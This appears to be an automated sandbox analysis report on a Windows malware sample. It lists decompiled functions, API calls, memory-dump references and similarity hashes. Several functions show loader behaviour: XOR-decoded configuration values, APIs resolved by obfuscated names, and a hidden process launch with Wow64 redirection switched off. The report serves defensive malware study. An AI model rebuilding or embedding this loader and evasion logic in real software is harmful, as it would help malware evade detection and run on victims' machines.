0x005062e1
0x005062e5
0x005062ee
0x005062f4
0x00506301
0x0050630e
0x00506314
0x0050631c
0x00506322
0x00506328
0x0050632c
0x00506330
0x00506336
0x0050633a
0x00506341
0x00506348
0x0050634c
0x00506357
0x0050635e
0x00506362
0x0050636b
0x0050636b
0x0050637c
0x0050637c
0x0050638b
0x00506391
0x00506391
0x0050639b
0x0050639b
0x005063ac
0x005063ac
0x005063ba
0x005063ba
0x005063ca

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00506142
GetTickCount.KERNEL32 ref: 00506156
wsprintfA.USER32 ref: 005061A5
wsprintfA.USER32 ref: 005061C2
wsprintfA.USER32 ref: 005061E3
wsprintfA.USER32 ref: 00506201
wsprintfA.USER32 ref: 00506216
wsprintfA.USER32 ref: 00506237
wsprintfA.USER32 ref: 00506271
wsprintfA.USER32 ref: 00506291
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005062AC
GetTickCount.KERNEL32 ref: 005062BC
RtlEnterCriticalSection.NTDLL(02FE95F0), ref: 005062D0
RtlLeaveCriticalSection.NTDLL(02FE95F0), ref: 005062EE

Part of subcall function 00505AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00506301,00000000,02FE9630), ref: 00505B0E
Part of subcall function 00505AE3: lstrlen.KERNEL32(00000000,?,00000000,00506301,00000000,02FE9630), ref: 00505B16
Part of subcall function 00505AE3: strcpy.NTDLL ref: 00505B2D
Part of subcall function 00505AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00505B38
Part of subcall function 00505AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00506301,?,00000000,00506301,00000000,02FE9630), ref: 00505B55

StrTrimA.SHLWAPI(00000000,005092CC,00000000,02FE9630), ref: 0050631C

Part of subcall function 00502829: lstrlen.KERNEL32(02FE887A,00000000,00000000,00000000,00506328,00000000), ref: 00502839
Part of subcall function 00502829: lstrlen.KERNEL32(?), ref: 00502841
Part of subcall function 00502829: lstrcpy.KERNEL32(00000000,02FE887A), ref: 00502855
Part of subcall function 00502829: lstrcat.KERNEL32(00000000,?), ref: 00502860

lstrcpy.KERNEL32(00000000,?), ref: 0050633A
lstrcat.KERNEL32(00000000,00000000), ref: 00506348
lstrcat.KERNEL32(00000000,00000000), ref: 0050634C
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 0050637C
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0050638B
HeapFree.KERNEL32(00000000,00000000,00000000,02FE9630), ref: 0050639B
HeapFree.KERNEL32(00000000,?), ref: 005063AC
HeapFree.KERNEL32(00000000,00000000), ref: 005063BA

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID:
API String ID: 1837416118-0
Opcode ID: 2bcd1cc9cdb5863ea2a3d7ee93269ad27cb01d56622bbf825b50903dd94b877b
Instruction ID: 65dec7fc835f6def9311c8d58cc9bd77cb3e665ccb94566eeb3da794e3eacd68
Opcode Fuzzy Hash: 2bcd1cc9cdb5863ea2a3d7ee93269ad27cb01d56622bbf825b50903dd94b877b
Instruction Fuzzy Hash: 19718171500205AFD721DB69DC8CD9E7BECFB98310F154925F849C3261E736E909EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C54AF5D, Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 6C54AF65
_free.LIBCMT ref: 6C54AF7E

Part of subcall function 6C543F97: HeapFree.KERNEL32(00000000,00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FAB
Part of subcall function 6C543F97: GetLastError.KERNEL32(00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FBD

_free.LIBCMT ref: 6C54AF91
_free.LIBCMT ref: 6C54AFAF
_free.LIBCMT ref: 6C54AFC1
_free.LIBCMT ref: 6C54AFD2
_free.LIBCMT ref: 6C54AFDD
_free.LIBCMT ref: 6C54B001
RtlEncodePointer.NTDLL(6D569338), ref: 6C54B008
_free.LIBCMT ref: 6C54B01D
_free.LIBCMT ref: 6C54B033
_free.LIBCMT ref: 6C54B05B

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: 857f3f2e5c1fb3e97b82c0fb2fb7555369422281dcf0b5be781c8162136dce4e
Instruction ID: 912bdc1ad3590a5045c857e35203e4f4a1a18632b5009ce8b51b050db4ff889a
Opcode Fuzzy Hash: 857f3f2e5c1fb3e97b82c0fb2fb7555369422281dcf0b5be781c8162136dce4e
Instruction Fuzzy Hash: AD218575A06BD0EFDF105F2DDC446A93BB0EB46B65B12412DE82493EB0EB395844CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0050762C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0050762C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x50a38c; // 0x2fe9cd0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00505F43(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x5091cc;
				}
				_t46 = E005043FD(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00505C4E(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x50a2d0; // 0x2add5a8
						_t16 = _t75 + 0x50bad8; // 0x530025
						 *0x50a13c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00505F43(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x5091d0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00505C4E(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00502A03(_v20);
						} else {
							_t66 =  *0x50a2d0; // 0x2add5a8
							_t31 = _t66 + 0x50bbf8; // 0x73006d
							 *0x50a13c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00502A03(_v12);
				}
				return _v24;
			}

0x00507634
0x0050763a
0x00507641
0x00507647
0x0050764b
0x0050764f
0x00507652
0x00507659
0x0050765c
0x0050765e
0x0050765e
0x00507667
0x0050766e
0x00507671
0x00507677
0x00507681
0x0050768a
0x00507691
0x005076aa
0x005076b1
0x005076b4
0x005076bd
0x005076c6
0x005076d7
0x005076e0
0x005076e4
0x005076e8
0x005076ef
0x005076f2
0x005076f4
0x005076f4
0x005076fe
0x00507707
0x0050770e
0x00507726
0x0050772a
0x00507767
0x0050772c
0x0050772f
0x00507737
0x00507748
0x00507754
0x0050775c
0x00507760
0x00507760
0x0050772a
0x0050776f
0x00507774
0x0050777b

APIs

GetTickCount.KERNEL32 ref: 00507641
lstrlen.KERNEL32(?,80000002,00000005), ref: 00507681
lstrlen.KERNEL32(00000000), ref: 0050768A
lstrlen.KERNEL32(00000000), ref: 00507691
lstrlenW.KERNEL32(80000002), ref: 0050769E
lstrlen.KERNEL32(?,00000004), ref: 005076FE
lstrlen.KERNEL32(?), ref: 00507707
lstrlen.KERNEL32(?), ref: 0050770E
lstrlenW.KERNEL32(?), ref: 00507715

Part of subcall function 00502A03: RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F

Strings

-tP, xrefs: 00507632

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID: -tP
API String ID: 2535036572-4025278887
Opcode ID: cc9c842ef6e57f10b05799209f4755a23e8843bb9c05c2e966ca68f4a97ddf92
Instruction ID: 36813cbab76fd57770a3801780034a752783d63e026987ddd1351c603af5e5cf
Opcode Fuzzy Hash: cc9c842ef6e57f10b05799209f4755a23e8843bb9c05c2e966ca68f4a97ddf92
Instruction Fuzzy Hash: E2413872D0021AEBCF12AFA4CD4999EBFB5FF48344F054090ED05A72A2E7359A14EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00507836, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00507836(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t71 =  *((intOrPtr*)(__eax + 0x14));
				_t39 = E005071A3(__ecx,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x14)) + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E00507973( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x50a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x50a2d0; // 0x2add5a8
					_t18 = _t50 + 0x50b55b; // 0x73797325
					_t52 = E00501000(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x50a2d0; // 0x2add5a8
						_t20 = _t53 + 0x50b73d; // 0x2fe8ce5
						_t21 = _t53 + 0x50b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x50a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E00502A03(_t76);
				goto L12;
			}

0x0050783f
0x0050784d
0x00507856
0x00507859
0x0050796b
0x00507972
0x00507972
0x00507868
0x00507870
0x00507875
0x00507878
0x0050788d
0x00507893
0x00507894
0x00507897
0x0050789d
0x005078a0
0x005078a5
0x005078ad
0x005078b4
0x005078bb
0x005078be
0x00507952
0x005078c4
0x005078c4
0x005078c9
0x005078d0
0x005078e4
0x005078e8
0x00507939
0x005078ea
0x005078ea
0x005078f1
0x005078f8
0x00507910
0x00507916
0x0050791a
0x00507934
0x0050791c
0x00507925
0x0050792a
0x0050792a
0x0050791a
0x0050794a
0x0050794a
0x005078be
0x00507959
0x00507962
0x00507966
0x00000000

APIs

Part of subcall function 005071A3: GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,00507852,?,?,?,?,00000000,00000000), ref: 005071C8
Part of subcall function 005071A3: GetProcAddress.KERNEL32(00000000,7243775A), ref: 005071EA
Part of subcall function 005071A3: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00507200
Part of subcall function 005071A3: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00507216
Part of subcall function 005071A3: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 0050722C
Part of subcall function 005071A3: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00507242

memset.NTDLL ref: 005078A0

Part of subcall function 00501000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00504F1C,73797325), ref: 00501011
Part of subcall function 00501000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0050102B

GetModuleHandleA.KERNEL32(4E52454B,02FE8CE5,73797325), ref: 005078D7
GetProcAddress.KERNEL32(00000000), ref: 005078DE
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 005078F8
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00507916
CloseHandle.KERNEL32(00000000), ref: 00507925
CloseHandle.KERNEL32(?), ref: 0050792A
GetLastError.KERNEL32 ref: 0050792E
HeapFree.KERNEL32(00000000,?), ref: 0050794A

Strings

8sP, xrefs: 00507836

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID: 8sP
API String ID: 91923200-3124762363
Opcode ID: 8ca399158f600b693f4468c93dbac0364c2cffaa689d4ae420709a20fe737c22
Instruction ID: 1653c3cd74e142ded06b4e415c2a0f335df2771b69c4a17e01884a58061c168c
Opcode Fuzzy Hash: 8ca399158f600b693f4468c93dbac0364c2cffaa689d4ae420709a20fe737c22
Instruction Fuzzy Hash: A93157B590421AFFDB11AFA4DC88EDEBFB8FF48350F104861E605A3161D771AA45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0050374B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0050374B(int* __ecx) {
				char _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				void* _t46;
				void* _t47;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				void* _t74;
				intOrPtr _t90;

				_t75 = __ecx;
				_t20 =  *0x50a2cc; // 0x63699bc3
				_t1 =  &_v8; // 0x502f44
				if(E00503D6B( &_v12, _t1, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x110) {
					 *0x50a320 = _v12;
				}
				_t25 =  *0x50a2cc; // 0x63699bc3
				_t5 =  &_v8; // 0x502f44
				if(E00503D6B( &_v12, _t5, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t74 = _v12;
					if(_t74 == 0) {
						_t31 = 0;
					} else {
						_t69 =  *0x50a2cc; // 0x63699bc3
						_t31 = E0050257B(_t75, _t74, _t69 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t8 =  &_v8; // 0x502f44
						_t75 = _t8;
						if(StrToIntExA(_t31, 0, _t8) != 0) {
							_t9 =  &_v8; // 0x502f44
							 *0x50a298 =  *_t9;
						}
					}
					if(_t74 == 0) {
						_t32 = 0;
					} else {
						_t65 =  *0x50a2cc; // 0x63699bc3
						_t32 = E0050257B(_t75, _t74, _t65 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t10 =  &_v8; // 0x502f44
						_t75 = _t10;
						if(StrToIntExA(_t32, 0, _t10) != 0) {
							_t11 =  &_v8; // 0x502f44
							 *0x50a29c =  *_t11;
						}
					}
					if(_t74 == 0) {
						_t33 = 0;
					} else {
						_t61 =  *0x50a2cc; // 0x63699bc3
						_t33 = E0050257B(_t75, _t74, _t61 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t12 =  &_v8; // 0x502f44
						_t75 = _t12;
						if(StrToIntExA(_t33, 0, _t12) != 0) {
							_t13 =  &_v8; // 0x502f44
							 *0x50a2a0 =  *_t13;
						}
					}
					if(_t74 == 0) {
						_t34 = 0;
					} else {
						_t57 =  *0x50a2cc; // 0x63699bc3
						_t34 = E0050257B(_t75, _t74, _t57 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t14 =  &_v8; // 0x502f44
						_t75 = _t14;
						if(StrToIntExA(_t34, 0, _t14) != 0) {
							_t15 =  &_v8; // 0x502f44
							 *0x50a004 =  *_t15;
						}
					}
					if(_t74 == 0) {
						_t35 = 0;
					} else {
						_t53 =  *0x50a2cc; // 0x63699bc3
						_t35 = E0050257B(_t75, _t74, _t53 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t16 =  &_v8; // 0x502f44
						_t75 = _t16;
						if(StrToIntExA(_t35, 0, _t16) != 0) {
							_t17 =  &_v8; // 0x502f44
							 *0x50a02c =  *_t17;
						}
					}
					if(_t74 == 0) {
						_t36 = 0;
					} else {
						_t49 =  *0x50a2cc; // 0x63699bc3
						_t36 = E0050257B(_t75, _t74, _t49 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t46 = 0x10;
						_t47 = E00505A4E(_t46);
						if(_t47 != 0) {
							_push(_t47);
							E0050461D();
						}
					}
					if(_t74 == 0) {
						_t37 = 0;
					} else {
						_t44 =  *0x50a2cc; // 0x63699bc3
						_t37 = E0050257B(_t75, _t74, _t44 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E00505A4E(0, _t37) != 0) {
						_t90 =  *0x50a37c; // 0x2fe9630
						E00506027(_t90 + 4, _t42);
					}
					_t38 =  *0x50a2d0; // 0x2add5a8
					_t18 = _t38 + 0x50b2d2; // 0x2fe887a
					_t19 = _t38 + 0x50b7c4; // 0x6976612e
					 *0x50a31c = _t18;
					 *0x50a390 = _t19;
					HeapFree( *0x50a290, 0, _t74);
					L48:
					return 0;
				}
			}

0x0050374b
0x0050374e
0x0050375f
0x0050376e
0x0050377c
0x0050377c
0x00503781
0x0050378c
0x0050379b
0x0050393e
0x00503940
0x00000000
0x005037a1
0x005037a1
0x005037a8
0x005037be
0x005037aa
0x005037aa
0x005037b7
0x005037b7
0x005037c8
0x005037ca
0x005037ca
0x005037d4
0x005037d6
0x005037d9
0x005037d9
0x005037d4
0x005037e0
0x005037f6
0x005037e2
0x005037e2
0x005037ef
0x005037ef
0x005037fa
0x005037fc
0x005037fc
0x00503806
0x00503808
0x0050380b
0x0050380b
0x00503806
0x00503812
0x00503828
0x00503814
0x00503814
0x00503821
0x00503821
0x0050382c
0x0050382e
0x0050382e
0x00503838
0x0050383a
0x0050383d
0x0050383d
0x00503838
0x00503844
0x0050385a
0x00503846
0x00503846
0x00503853
0x00503853
0x0050385e
0x00503860
0x00503860
0x0050386a
0x0050386c
0x0050386f
0x0050386f
0x0050386a
0x00503876
0x0050388c
0x00503878
0x00503878
0x00503885
0x00503885
0x00503890
0x00503892
0x00503892
0x0050389c
0x0050389e
0x005038a1
0x005038a1
0x0050389c
0x005038a8
0x005038be
0x005038aa
0x005038aa
0x005038b7
0x005038b7
0x005038c2
0x005038c4
0x005038c7
0x005038c8
0x005038cf
0x005038d1
0x005038d2
0x005038d2
0x005038cf
0x005038d9
0x005038ef
0x005038db
0x005038db
0x005038e8
0x005038e8
0x005038f3
0x00503901
0x0050390b
0x0050390b
0x00503910
0x00503916
0x00503923
0x00503929
0x0050392f
0x00503934
0x00503941
0x00503945
0x00503945

APIs

StrToIntExA.SHLWAPI(00000000,00000000,D/P,?,D/P,63699BC3,?,D/P,63699BC3,E8FA7DD7,0050A00C,745EC740,?,?,00502F44), ref: 005037D0
StrToIntExA.SHLWAPI(00000000,00000000,D/P,?,D/P,63699BC3,?,D/P,63699BC3,E8FA7DD7,0050A00C,745EC740,?,?,00502F44), ref: 00503802
StrToIntExA.SHLWAPI(00000000,00000000,D/P,?,D/P,63699BC3,?,D/P,63699BC3,E8FA7DD7,0050A00C,745EC740,?,?,00502F44), ref: 00503834
StrToIntExA.SHLWAPI(00000000,00000000,D/P,?,D/P,63699BC3,?,D/P,63699BC3,E8FA7DD7,0050A00C,745EC740,?,?,00502F44), ref: 00503866
StrToIntExA.SHLWAPI(00000000,00000000,D/P,?,D/P,63699BC3,?,D/P,63699BC3,E8FA7DD7,0050A00C,745EC740,?,?,00502F44), ref: 00503898
HeapFree.KERNEL32(00000000,?,?,D/P,63699BC3,?,D/P,63699BC3,E8FA7DD7,0050A00C,745EC740,?,?,00502F44), ref: 00503934

Strings

D/P, xrefs: 0050375F, 0050378C, 00503892, 0050389E, 00503860, 0050386C, 0050382E, 0050383A, 005037FC, 00503808, 005037CA, 005037D6, 00503762, 0050378F, 005037CD, 005037FF, 00503831, 00503863, 00503895

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: D/P
API String ID: 3298025750-4054160791
Opcode ID: b4ab02eb2fe8a81ba145327db2c53a52ce73bbdea7a50a5e187e90f3f00b7a66
Instruction ID: 148ad09605cc4edff280942018290093df49c1870f48965cbee2ed272ad0b306
Opcode Fuzzy Hash: b4ab02eb2fe8a81ba145327db2c53a52ce73bbdea7a50a5e187e90f3f00b7a66
Instruction Fuzzy Hash: 6051B1B5A01206ABDB10DBB9DDC9C6F7FEDBF88700B284D65B401D7195E631DB049B21

Uniqueness

Uniqueness Score: -1.00%

Function 6C540B90, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6C540BC4
__CxxThrowException@8.LIBCMT ref: 6C540BF0
__CxxThrowException@8.LIBCMT ref: 6C540C18
__CxxThrowException@8.LIBCMT ref: 6C540C40

Strings

ios_base::badbit set, xrefs: 6C540BC9
ios_base::eofbit set, xrefs: 6C540C1D
ios_base::failbit set, xrefs: 6C540BF5

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 429c4468475db921b00b9096753fc794fb5a428e664bc60f92caa244a2985ded
Instruction ID: b71d36da2941e9db466c079a93c16259e1c608bbb9f565c9389e2f4587984876
Opcode Fuzzy Hash: 429c4468475db921b00b9096753fc794fb5a428e664bc60f92caa244a2985ded
Instruction Fuzzy Hash: 120196B1449340FAD310FA21CC1AF8E77E5DB94708F50CC0AB18866E83EB749D08CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 6C542962, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C542969
std::_Lockit::_Lockit.LIBCPMT ref: 6C542973

Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011

Part of subcall function 6C53EB90: std::_Lockit::_Lockit.LIBCPMT ref: 6C53EB9F

codecvt.LIBCPMT ref: 6C5429AD
std::bad_exception::bad_exception.LIBCMT ref: 6C5429C1
__CxxThrowException@8.LIBCMT ref: 6C5429CF
std::_Facet_Register.LIBCPMT ref: 6C5429E5

Strings

bad cast, xrefs: 6C5429B9

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 1512642153-3145022300
Opcode ID: 4befa1e2826299c597247581e6089d527d3f9c715ad8a4e9d6d65647c3228bfe
Instruction ID: f66e3b0509322ebd4d2618b74728fa0dd5c9f94d04fedd6c86a06cde9ad1e8ef
Opcode Fuzzy Hash: 4befa1e2826299c597247581e6089d527d3f9c715ad8a4e9d6d65647c3228bfe
Instruction Fuzzy Hash: 38016D76900128DBCF05DBA4CC58AEE73B4BF84729F158519E415EBAD0EF349D48C791

Uniqueness

Uniqueness Score: -1.00%

Function 6C53FC20, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 137COMMON

Download Yara Rule

APIs

_localeconv.LIBCMT ref: 6C53FC53
__Getcvt.LIBCPMT ref: 6C53FC61

Part of subcall function 6C542252: ____lc_codepage_func.LIBCMT ref: 6C542269
Part of subcall function 6C542252: ____mb_cur_max_func.LIBCMT ref: 6C542272
Part of subcall function 6C542252: ____lc_locale_name_func.LIBCMT ref: 6C54227A

__Getcvt.LIBCPMT ref: 6C53FCBC

Strings

false, xrefs: 6C53FD05
,, xrefs: 6C53FD6D
true, xrefs: 6C53FD1B

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Getcvt$____lc_codepage_func____lc_locale_name_func____mb_cur_max_func_localeconv
String ID: ,$false$true
API String ID: 3073657462-760133229
Opcode ID: d8f6ee8eca85715ad7a08ad78b90aa49e1d69ea61e62b7b83323c7bc6fdcdedf
Instruction ID: 8834043d077a69b7c08770166c50ea18451bfac1bdd7d68add71ef2f92f6b3e9
Opcode Fuzzy Hash: d8f6ee8eca85715ad7a08ad78b90aa49e1d69ea61e62b7b83323c7bc6fdcdedf
Instruction Fuzzy Hash: B25180B1C04258DADB11CF94CC44BEEBBB8FF84304F14425AD855AB741E735AA49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C5461AE, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 6C54C407: __getptd_noexit.LIBCMT ref: 6C54C408
Part of subcall function 6C54C407: __amsg_exit.LIBCMT ref: 6C54C415

RtlEncodePointer.NTDLL(00000000), ref: 6C5461D8
_CallSETranslator.LIBCMT ref: 6C54620E
_GetRangeOfTrysToCheck.LIBCMT ref: 6C546238

Strings

RCC, xrefs: 6C5461F5
MOC, xrefs: 6C5461ED
=b, xrefs: 6C5461C5

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: CallCheckEncodePointerRangeTranslatorTrys__amsg_exit__getptd_noexit
String ID: MOC$RCC$=b
API String ID: 3119380580-92667700
Opcode ID: 31fcebf25edf5e1b293eea4ad50211a7bb706fd41ef7e882c172172c3ff5cddb
Instruction ID: e0a020fb7f47155d08f004e49641e3f213ad8650c6e9a86ae8644b9b8bf4d127
Opcode Fuzzy Hash: 31fcebf25edf5e1b293eea4ad50211a7bb706fd41ef7e882c172172c3ff5cddb
Instruction Fuzzy Hash: 21416732504209EFDB11CF84CC80FEEB7B6EF84318F298259E914A7651DB35AD61DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C53E010, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C53E03D

Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011

std::_Lockit::_Lockit.LIBCPMT ref: 6C53E063
std::bad_exception::bad_exception.LIBCMT ref: 6C53E0E7
__CxxThrowException@8.LIBCMT ref: 6C53E0F6
std::_Facet_Register.LIBCPMT ref: 6C53E10D

Strings

bad cast, xrefs: 6C53E0DE

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

